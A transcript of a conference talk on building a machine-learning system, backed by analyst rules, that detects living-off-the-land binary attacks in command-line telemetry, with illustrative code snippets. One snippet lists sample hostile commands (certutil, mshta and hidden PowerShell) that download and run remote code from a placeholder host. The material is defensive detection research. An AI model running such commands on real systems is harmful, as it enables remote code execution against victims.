
Good afternoon, and welcome to the BSides Las Vegas Ground Truth track. This talk is Weeding Out Living off the Land Attacks at Scale, given by (oh god, I forgot your name) by Adarsh. A few announcements before we begin. We'd like to thank our sponsors, especially our diamond sponsors LastPass and Palo Alto Networks, our gold sponsors Amazon and Vizium, and Google for their support, along with our other sponsors, donors, and volunteers that make this event possible. These talks are being streamed live, except in the Underground track, and as a courtesy to our speakers and audience, we ask that you check to make sure that your cell phones are set to silent or vibrate. If you have a question, we're actually doing questions at the end; if you do have one, use this microphone that I'm standing at in the middle of the room so YouTube can hear you. As a reminder, the BSides LV photo policy prohibits taking pictures without the explicit permission of everyone in frame. These talks are all being recorded and will be available on YouTube in the future, again with the exception of Underground, of course. Please keep your mask on at all times, and if you want to move closer to the middle of the room, please keep social distancing in mind as well. With that, let's get started. Welcome, Adarsh. [Applause]

Thank you. Can everyone hear me okay, all the way
at the back? All right, sounds good. So hi everyone, I'm Adarsh. I'm a research manager at Sophos AI, and today I'll be talking about weeding out living off the land attacks at scale. A little bit about me: I have been working at the intersection of security and machine learning for... is it cutting out? I feel like it's cutting out. Okay, sorry about that. So I've been working at the intersection of data science and machine learning for four and a half years, all of that at Sophos AI. I joined right out of grad school; I completed a master's degree in computer science with a specialization in artificial intelligence and machine learning at UC San Diego. Currently I live in Denver with my dog, and I'm originally from India; I grew up in Bangalore and moved to the U.S. for grad school. So before I begin talking about the technical details of this talk, I'd like to mention that the work that went behind this talk is a huge collaborative effort across several
teams in Sophos AI. This involves data scientists, data engineers, threat analysts, software engineers, and program managers, and I'd like to take a minute to acknowledge their contributions and thank them. Now let's get to the technical specifics. What is this talk about? This talk details the development of a machine learning system that detects living off the land binary attacks. The system is supposed to be another detector or sensor that feeds alerts into the security operations center. If you attended Ben's talk yesterday, Ben Gelman from Sophos AI, you got some context on how we have different sensors that feed alerts into our security operations center, and how these alerts are then manually reviewed by our SOC analysts. So we'll look into the technical details of how we designed the system that surfaces living off the land binary attack alerts, the challenges we faced during the development of the system, the strategies we used to mitigate them, and finally the general lessons that we learned along the way. If you attended Josh's talk yesterday, you'll remember this slide. Spoiler alert: I come to pretty much the same conclusion at the end of this talk, I just take a different path. I use this project as kind of a case study to demonstrate each of the points that he made yesterday.
Okay, so what are the goals of this system? It's important to define the goals before we start working on it. The first goal is to surface additional living off the land attacks to the security operations center that are not yet being detected by existing methodologies. But more importantly, the second goal is that since this system is going to surface alerts to a security operations center, it's not supposed to be flooding the SOC with alerts, especially not false positive alerts. Now that we have the goals squared away, let's move on to understanding the actual problem. What are living off the land binary attacks? Living off the land attacks, or LOLBin attacks for short, are attacks that involve the use of binaries that are either pre-installed by the user on a system or existing system binaries. These binaries are used in a malicious way, and that's what constitutes a LOLBin attack. In general, the attack vector for this attack is a command line that is executed against said binary. These attacks tend to be extremely hard to detect and defend against for many reasons, some of which are that they have a very small footprint on the user system, and sometimes it's really hard to differentiate between legitimate sysadmin activity and LOLBin attacks, among several other reasons. So our problem is that we want to detect LOLBin attacks with machine learning.
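To ground the definition, here are a few well-known LOLBin-style command line patterns, drawn from public LOLBAS-style documentation rather than from the talk's own data set; the URLs are placeholders:

```python
# Well-known LOLBin abuse patterns: legitimate system binaries doing things
# an attacker wants, like downloading or executing remote code. These are
# illustrative textbook examples, not samples from the talk's telemetry.
EXAMPLES = [
    # certutil, a certificate utility, abused as a file downloader
    "certutil.exe -urlcache -split -f http://example.com/payload.exe payload.exe",
    # mshta executing a remote HTML application
    "mshta.exe http://example.com/run.hta",
    # powershell fetching and running a script in memory
    "powershell -nop -w hidden -c \"iex (iwr 'http://example.com/a.ps1')\"",
]
```

Each of these uses a binary that ships with Windows, which is exactly why command line context, rather than the binary itself, is the detection artifact.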
So is this a good nail for the hammer of machine learning? In order to determine whether this is a good candidate problem to be solved by machine learning, we need a couple of things. We've established that the artifact we can use to detect a LOLBin attack is usually the command line that is executed, so we need a lot of representative command line data that is very similar in distribution to the actual command line data that we'll be predicting against. Second, we need a lot of good labels for this data; in order to teach a machine learning model what is a malicious command and what is a benign command, we need to have plenty of examples that span a wide variety of use cases. Well, the first problem is not really an issue, because working at a large security vendor, we have plenty of access to the actual distribution of command line data that we'll be predicting against. In this work we mainly focus on detecting and surfacing alerts to MDR, the managed detection and response system, and there we have about 1.5 billion command line invocations per day across all our customers, which feed into the existing detection and alerting system. So this is the data that we actually want to plug our model into and surface additional alerts from. A machine learning based detector is
actually the perfect addition here considering the incoming data volume, because invariably, when you have one and a half billion command lines, there are a few attacks that are getting through, that are probably being missed right now. So having data is not an issue, but often we run into snags when we need to have enough labels. Finding labels for command line data can be a little harder, and it also often becomes a catch-22 problem: if you have a reliable, quick, and accurate way to label your command lines, then why do you need a machine learning model to detect LOLBins? However, we don't have any such quick, reliable systems, so we have to resort to a three-pronged strategy to label the command line data that we've got.
So here are the three different strategies that we use to label our data. The simplest source of labels for our problem lies in past data: some LOLBin attacks have already been seen and investigated by the security operations center, and we have that information stored, so we can just directly use it. The second source, where we got really creative, is indirect labels. Sophos has a lot of different products, and across all these products we have labeled data for several artifacts like files and URLs, and we can use this information to indirectly label command lines. For example, if a malicious file on a user system also triggers the execution of a malicious command line, there we have an example of a known malicious command line that we can use to augment our training data. And the third strategy that we used is that we now have a dedicated group of threat analysts who are part of Sophos AI, who distill all the information from the first two sources and all the knowledge that they have, and create rules. These rules can be used for labeling our data. So here's an example of the indirect labeling through a Sophos product that I talked about: Intercept X has something called root cause analysis, where, when it finds a malicious file, it constructs a graph of all operations
that the triggering file performs on the user system. This involves touching files, deleting files, creating processes, and, more importantly, running command lines. So we collect a lot of potentially malicious command lines from this data, and here on the slide you can see an example of a root cause analysis graph and a command line that we obtained from there that could potentially be malicious. Some other sources for indirect labeling: we use sandbox behavior reports. One good thing about sandbox behavior reports is that the detection engine hooks into the Windows Antimalware Scan Interface, which means that it gets access to the actual blob of code that is executing when a command line invocation happens. That means it can get through a lot of issues with obfuscation, or cases like when you're trying to execute code from a .ps1 file and we can't see what the contents of the .ps1 file are from the command line itself. So we get a lot of indirect labels from that source. We also do URL lookups, where through our web protection product we have a repository of URLs that are labeled as malicious or benign, and if there is an embedded URL within a command line, then we can look up that embedded URL and see if it's something malicious. So, if a command line is operating on a malicious
URL, it's more likely that the command line is going to be malicious. And then the final approach is manual review and labeling through incident investigation data. Here, our analysts go through incident investigation reports and manually review whether the case was actionable and whether there are associated LOLBin command lines in the incident, and then they create rules using regular expressions to capture future occurrences of such commands. These rules are categorized into four different types. First, there are strong malicious rules: a malicious rule is given to a known malicious command line or a known attack, and is given only in cases of really high confidence. You can treat this as basically a block list. An example is when we have a known attack pattern, like a PowerShell command performing an unsecured download through a very specific port; that's a good way to identify that something we've already seen before is happening on a user system. Then there are suspicious rules: if command line activity is seen as potentially malicious but we don't have high enough confidence to completely convict it, then it receives a suspicious label. An example is listing credentials, which is suspicious behavior but could also be legitimate in a different context, such as when a sysadmin is trying to look at credentials or
something like that. Then we have the other side of the coin, where we have weak benign labels, or debatable labels: potentially benign activity is given this weak benign label. We think this activity is more likely to be benign, but a machine learning system could potentially trip up on it because it's doing something strange; for example, it has a big Base64-encoded chunk in it that a model could see as potentially malicious. And then we have strong benign labels, which is basically known benign activity. For our machine learning experiments, we take the first and last categories of rules, the block list and allow list, and augment our labels using these rules. The suspicious and debatable rules are used in a different way, which I will get to in a later section. So, in a nutshell, here's the entire labeling strategy. There are two label sources: indirect labels that are obtained by cross-referencing command lines, and command lines that are found to be malicious based on incident investigation reports. And then there are human analysts who are looking at both these data sources and creating rules, which are also then used to augment the labels that we have. At the end of this labeling strategy, we end up with a labeled data set which we can finally use to
experiment with different machine learning models. So here are some data statistics for the data sets we used to train our machine learning models. We have about 76 million samples in our training set, out of which about 1.6 million are malicious; 7 million samples in the validation set, of which 70,000 are malicious; and then about 12 million samples in our test set. Importantly, here we use time splitting, and I think my colleague Ben talked about this in his talk too: it's really important to time split, where you're essentially simulating new data. In this case, the model has seen data until the first of April 2022 in the training set, so when you're trying to validate the model, when you're trying to test its performance, you're not giving it any command lines that it has already seen. The validation set is created in such a way that there are no overlapping commands, and it contains only the command lines that are seen after the first of April 2022 in our systems. It's the same with the test set, where we collect data from the first of May 2022 to the first of July 2022.
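As a rough sketch, the time-based split described here might look like the following; the record format is an assumption, while the date boundaries follow the talk:

```python
from datetime import datetime

def time_split(samples, train_end, valid_end, test_end):
    """Chronologically split (timestamp, command_line, label) records.

    Training only sees commands before train_end; validation and test only
    see later windows, and any command string already seen in an earlier
    split is dropped so the splits share no overlapping commands.
    """
    train = [(c, y) for t, c, y in samples if t < train_end]
    valid = [(c, y) for t, c, y in samples if train_end <= t < valid_end]
    test = [(c, y) for t, c, y in samples if valid_end <= t < test_end]

    seen = {c for c, _ in train}
    valid = [(c, y) for c, y in valid if c not in seen]
    seen |= {c for c, _ in valid}
    test = [(c, y) for c, y in test if c not in seen]
    return train, valid, test

# Boundaries from the talk: train up to April 1, validate April-May,
# test May through July of 2022.
TRAIN_END = datetime(2022, 4, 1)
VALID_END = datetime(2022, 5, 1)
TEST_END = datetime(2022, 7, 1)
```

The deduplication step is what guarantees the model is never evaluated on a command line it memorized during training.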
We first train a baseline model on this data. We use baseline models as a simple benchmark before training more complicated models, so that we keep track of how well the actual models are doing and that they're not performing worse than the simplest possible model that we could use. For this baseline model, we preprocess the command lines, remove whitespace, decode any Base64-encoded chunks, and then develop a feature representation that consists of three different parts. First, we generate summary statistics for the number of transitions between six different character classes: digits, whitespace, uppercase vowels, lowercase vowels, uppercase consonants, and lowercase consonants. We count the number of times in a command line we have transitions between those character classes, so we basically get a six by six grid of counts, which we then flatten into 36 different features. We also count the number of occurrences of special tokens, like a PowerShell Invoke-Expression or a dollar sign that could indicate that you're trying to use a variable inside a command line. And then the final kind of features is the number of special symbols that are used in the command line, like opening and closing braces, whether there are any URLs used, and also the length of the command line. And for the machine learning model, we
use a simple XGBoost model for our experiments. So that was the baseline model. We also conduct our experiments with two convolutional neural networks. In order to provide the command line as an input to these models, though, we need a different kind of feature representation: we first need to convert the characters into integers, in a way that the model can consume. On the slide I have a simple example of how we do this with just uppercase alphabets. If I created an integer representation for the alphabets A to Z, where I give them numbers starting from 1 to 26, then if I have a string that says "BSIDES LAS VEGAS", I can replace all the characters with the associated integers, replace whitespace with zero, and then I have a list of numbers that represents that string. The only difference between the feature representation that we develop and the example here is that the size of the vocabulary, or the number of characters we consider, is a lot higher; for the command lines, we basically consider all printable characters. These are the two convolutional neural network models that we experiment with: the one on the left is a simpler architecture, with a single convolutional layer and a small dense layer, and the one on the right
is actually a neural network architecture that we have used in the past to detect many different string artifacts, like URLs, file paths, or registry keys; any string artifact, basically. You can read about this model architecture on our site, where one of our data scientists, Sarnath, has written a great explainer blog post, so I won't go into the details of the network architecture here in the interest of time. So these are the model results that we got for the three different models; these are the best results that we've obtained after hyperparameter optimization. If you're unfamiliar with this plot, let me take a quick aside to explain.
It's called the receiver operating characteristic curve, or the ROC curve for short. It basically plots the true positive rate on the y-axis against the false positive rate on the x-axis, for different thresholds of the model score. Let me break that down a little bit. The true positive rate is the number of correct malicious predictions by a model as a fraction of the total number of truly malicious commands in the data. The false positive rate is the number of false positives as a fraction of the total number of benign samples in the data. The machine learning models that we train here output a score between 0 and 1, with a higher score denoting a greater chance of a command line being malicious. So when I talk about deciding what threshold to use, that's the value that I'm talking about: if I decide that anything above 0.5 is what I'm going to consider malicious, then I'm going to get a different subset of malicious commands detected by the model than if I used 0.6. That's my threshold. So why do false positives happen, and why do the true positive and false positive rates change based on the threshold that we use for a model? When we train a machine learning model, what it is doing is learning an association between the inputs and the outputs. As we saw in the case of command lines, machine learning models can
consume only numeric inputs, so we need to create numeric representations for the artifacts that we want the model to predict on. We can't just supply it with a command line; we need to create a representation for that command line. In an ideal case, like on the left, the representation that we chose for our data might make it easy for the model to separate out the good from the bad. Instead of coming up with 50 numbers, if you came up with two numbers that represented your data and plotted it on a scatter plot like that, then if you chose your two numbers correctly, ideally you should be able to separate out your good samples from your bad samples. But unfortunately this is only an ideal case, and in a real case, the nature of the data itself often does not let you do this. The real case is much closer to something on the right, which is why, if you change your threshold, if you change the location where you draw the line, you get a different false positive rate and a different true positive rate. The optimization problem that you're trying to solve here is basically whether you are going to bias towards creating more false positives or more false negatives, and like I
mentioned in the goals section before, we definitely do not want to create a lot of false positives, even if it is at the cost of a few false negatives. We want the system to be usable, and creating a lot of false positives makes the whole system useless. So, that was a lot of information, so I'm just going to pause here for a few seconds. This is my dog; his name is Hobbes. I named him after my favorite character from my favorite comic book, Calvin and Hobbes. When I got him, he was supposed to be five months old and a Lab puppy, but it turns out the rescue made a mistake, and he's actually a Lab-Beagle mix; he's actually an adult and just looks like a Lab puppy. Now that's a false positive I don't mind.
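Before moving on, the two rates from the ROC discussion can be computed directly from their definitions; this is a minimal sketch with toy scores and labels, not real model output:

```python
def tpr_fpr(scores, labels, threshold):
    """True and false positive rates at a given score threshold.

    scores are model outputs in [0, 1]; labels use 1 = malicious, 0 = benign.
    TPR = correct malicious predictions / all truly malicious samples.
    FPR = benign samples flagged malicious / all benign samples.
    """
    tp = sum(1 for s, y in zip(scores, labels) if s >= threshold and y == 1)
    fp = sum(1 for s, y in zip(scores, labels) if s >= threshold and y == 0)
    positives = sum(labels)
    negatives = len(labels) - positives
    return tp / positives, fp / negatives

# Sweeping the threshold from 1 down to 0 traces out the ROC curve:
# each threshold gives one (FPR, TPR) point on the plot.
```

Lowering the threshold catches more true positives but admits more false positives, which is exactly the trade-off the talk describes.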
Okay, so we described the machine learning model that we trained, and we described the results that we got. A simple question: is this deployable? What we did was look at the output of this model when we plugged it into a one percent sample of our one and a half billion command line event stream, and this is what happened. This plot tells us the number of detections by the machine learning model on a daily basis for the past three weeks. You can see that it's creating hundreds of alerts, which practically makes it unusable, because it's very unlikely that there are actually hundreds of living off the land binary attacks happening. So
we had a model with reasonably good accuracy that is doing really poorly. Why is this happening? This doesn't seem like expected behavior, right? Well, this is known as the false positive paradox, or the base rate fallacy, and it's commonly seen in a lot of machine learning applications, especially in security. Let's understand this with an example. Let's say that we have a near perfect ML model, even better than the ML models that I've trained so far (I could conduct research for another five years and get the best possible model out there), and let's say it has a true positive rate of 100 percent, which means that if it ever sees a malicious command, it's always going to detect it as malicious. And the only downside is that out of every 10,000 benign command lines it sees, it's going to say that one of them is actually malicious; so it's going to make one false positive for every 10,000 benign samples. This is a really good model, right? But if you actually compute the math, it turns out this model creates a problem when plugged into our event stream. So if we plug it into the event stream and assume that there are 150 malicious command
lines a day and one and a half billion benign command lines a day, which is probably close to the real number, then it generates 150 true positives; it has a hundred percent true positive rate, so it's going to detect every one of those malicious commands. But what happens to the false positives? Since we have one and a half billion benign commands, even a model that creates only one false positive for every 10,000 samples still creates a hundred and fifty thousand false positives. At that point, the machine learning model is really not helping the SOC analyst; the SOC analyst is just going to drown in alerts. And if you do the math, that is one true positive per 1,000 false positives, which is a terrible accuracy number for the model. So why does this actually happen? If you look at the distribution of malicious versus benign, that is the main culprit here: we have very few malicious commands, or a very low base rate of malicious commands, compared to the number of benign commands. Hypothetically, if you had a 50-50 distribution, if you had 750 million malicious commands and 750 million benign commands and you ran them through the same model, that model would produce 750 million malicious detections for only 75,000 benign detections, which is really great: that's 10,000 true positives for every false positive.
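The arithmetic behind the base rate fallacy is easy to check; the numbers below are the talk's hypothetical, not measured rates:

```python
def expected_alerts(n_malicious, n_benign, tpr, fpr):
    """Expected daily true and false positives for a detector on a stream."""
    return n_malicious * tpr, n_benign * fpr

# The talk's hypothetical: a perfect true positive rate and only one false
# positive per 10,000 benign commands, against 150 malicious versus
# 1.5 billion benign command lines per day.
tp, fp = expected_alerts(150, 1_500_000_000, tpr=1.0, fpr=1 / 10_000)
# tp = 150.0 true positives, fp = 150000.0 false positives:
# 1,000 false positives for every true positive, despite the "great" model.
```

The same function with a 50-50 base rate shows why the distribution, not the model, is the culprit: 750 million true positives against only 75,000 false positives.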
So yeah, this is the main problem that we face when trying to apply machine learning to this use case. How do we work around this problem? What is the solution? Is the system completely useless? Have we failed our goals? Well, not quite; there are options. As Josh and others have mentioned before in their talks, deploying ML as a standalone system almost never works, especially in security, because we always have this kind of skewed data distribution. What we need are guardrails: we need to control when the machine learning model actually comes into play, so that it can contribute where it performs best. We don't apply it to every single command line that we see; we apply it selectively. What guardrails should we use? Earlier we talked about using analyst-defined regex rules to augment our labeling, and I alluded to the fact that we also have suspicious and debatable labels; that is exactly what we use for guardrails in this case. So, just to detail the system a little bit: if we have no rules matching for a given command line, then it doesn't matter what the ML score is, we are just not going to create an alert. Here are some examples where the machine learning model thinks that something is malicious but there are no regex matches, so we're
not going to alert. As you can see, it seems like these are not actual malicious commands, but we also noticed that our machine learning model has a bias towards detecting smaller commands as malicious, because it has very little information, so it's behaving in an unstable way. Then, if any of our strong rules matches, any of our high confidence rules, we don't feel the need to go to the machine learning model to tell us whether something is malicious or benign; we just directly take the output of the rule, and we decide whether to surface an alert or not. But the real contribution of the machine learning model comes when there is a suspicious rule that is triggered. If you remember, a suspicious rule is when there is potentially malicious activity, but we are not entirely sure, because in some contexts it could be used in a benign way. Here we use the model: if the model scores highly on a command line that triggers a suspicious rule, then we generate an alert, and if not, then we don't generate an alert; instead we create something called a silent detection, which we want to review later. So we won't surface an alert, but we'll store it in our telemetry for further review. And then we have debatable rules, where again we do something similar: if there is a debatable rule that is triggered, then we look at the ML verdict. If the machine learning model says that a command line that triggers a debatable rule is malicious, then we create a silent detection and wait for further review, but if the machine learning model says that it's benign and it triggers a debatable rule, then we don't surface an alert. So there was a lot of information, and I want to put it all together and provide some high level context, just so you understand all the pieces that go into the system.
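Putting the guardrail logic together, a minimal sketch of the decision function might look like this; the rule-type names and the 0.5 threshold are illustrative assumptions, not the production values:

```python
from enum import Enum

class Verdict(Enum):
    ALERT = "alert"              # surface to the SOC
    SILENT = "silent_detection"  # store in telemetry for later review
    NONE = "no_alert"

def guardrail_decision(rule_match, ml_score, threshold=0.5):
    """Combine an analyst rule verdict with the ML score.

    rule_match is None or one of 'block', 'allow', 'suspicious', 'debatable'.
    The ML model only gets a vote when a suspicious or debatable rule fires.
    """
    if rule_match is None or rule_match == "allow":
        return Verdict.NONE      # never alert on the ML score alone
    if rule_match == "block":
        return Verdict.ALERT     # high-confidence rule: alert directly
    if rule_match == "suspicious":
        # high ML score confirms the suspicion; low score goes to telemetry
        return Verdict.ALERT if ml_score >= threshold else Verdict.SILENT
    if rule_match == "debatable":
        # even a high ML score only earns a silent detection here
        return Verdict.SILENT if ml_score >= threshold else Verdict.NONE
    raise ValueError(f"unknown rule type: {rule_match!r}")
```

Note that the model can never generate an alert on its own: an alert requires either a block rule or a suspicious rule agreeing with a high ML score, which is what keeps the base rate problem in check.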
So, during machine learning training, we collect data from the event stream, we clean and sample it, and then source labels from three different locations: we have indirect labels, we have past data, and then we have allow list and block list rules that analysts have created. Using this labeled data set, we then train a machine learning model. When it comes to prediction, we plug both the machine learning model and the analyst-created rules into our system, and we only create alerts in two separate scenarios: one of them is if a block list rule is triggered, and the other is if suspicious activity is detected and the machine learning model also detects the same suspicious command
line. So, we started off saying that we wanted to surface additional alerts into the system while not flooding the SOC. Did we actually meet this goal? This bar plot shows us the total number of unique alerts that we generated per day when the system is deployed, and it looks like we certainly create a manageable number of alerts now, at least compared to the previous system. The blue bars here denote the number of alerts that are generated by the block lists, and the orange bars denote the number of alerts that are created by suspicious command lines that are detected by the machine learning model. It looks like on most days the system does not create more than 50 alerts. A manageable number of alerts is well and good, but how good are the alerts actually? It's important to create alerts that are very likely to be malicious, because we want to build the SOC analysts' trust in our detector, so we want it to be as precise as possible. This plot shows the true positive rate and the false positive rate for the alerts generated by the entire system when plugged into the event stream, computed on a weekly basis for the past four weeks. We see that the true positive rate hovers between 0.9 and 1, which is a pretty good rate of detections, a pretty good
precision. Combine this with a manageable number of alerts, and we think we have a very deployable system. The second question: did we actually add value? The plot here shows the number of alerts that were seen in the entire system on a weekly basis for the past three weeks. The teal block shows the number of alerts that were created by the existing system; the yellow section shows the intersection, that is, attacks detected by both the existing system and our system; and the blue section, which is the most encouraging, is the new alerts that were surfaced by just our system and weren't surfaced by the existing system. Although this number is small right now, we have nowhere to go but up, and over time we think that our system should improve significantly and produce more actionable alerts. A big part of our system is the involvement of the Sophos AI analyst team, who have created dashboards that continuously monitor the performance of the system. They then use this information to tweak their rules, catch false positives, and improve the guardrails as a continuous process. Again, this is in line with what Josh talked about and what Ben talked about: involving humans in a feedback loop in order to continuously improve the performance of our systems.
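As one example of the kind of metric such a dashboard might track, a weekly precision number over analyst-reviewed alerts could be computed like this; the verdict format is an assumption for illustration:

```python
from collections import Counter

def weekly_precision(reviewed_alerts):
    """Precision of surfaced alerts, from analyst review verdicts.

    reviewed_alerts: iterable of 'true_positive' / 'false_positive' strings,
    one per alert reviewed that week. Returns None when nothing was reviewed.
    """
    counts = Counter(reviewed_alerts)
    total = counts["true_positive"] + counts["false_positive"]
    return counts["true_positive"] / total if total else None
```

A sustained drop in this number is the signal for analysts to tighten a rule or adjust a guardrail, closing the feedback loop the talk describes.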
So, a quick summary of everything that we talked about in this talk. LOLBin attack detection is a hard problem with several challenges: there is a large data volume, there is a low base rate of malicious activity, and labels are hard to come by. We've demonstrated some strategies that we used to mitigate these problems and work around them. Another important lesson that we learned here is that good data engineering really pays dividends: we basically went fishing through our data lake and got as much data as possible in order to label our command lines and increase label coverage. We got representative data, we had a good labeling strategy, and we also created dashboards and performed further validation and analysis to ensure continuous improvement of our system. Another lesson that we learned here is that even the best machine learning models cannot perform well as a standalone system; they need guardrails. The way forward, basically, is to integrate rule-based detection and human analysts into the machine learning system and create continuous improvement and feedback loops. And that's all I've got for today. Thank you. Any questions? [Applause]
I'll be around in the room; if you have any questions, you can come up to me and ask me more. Thank you.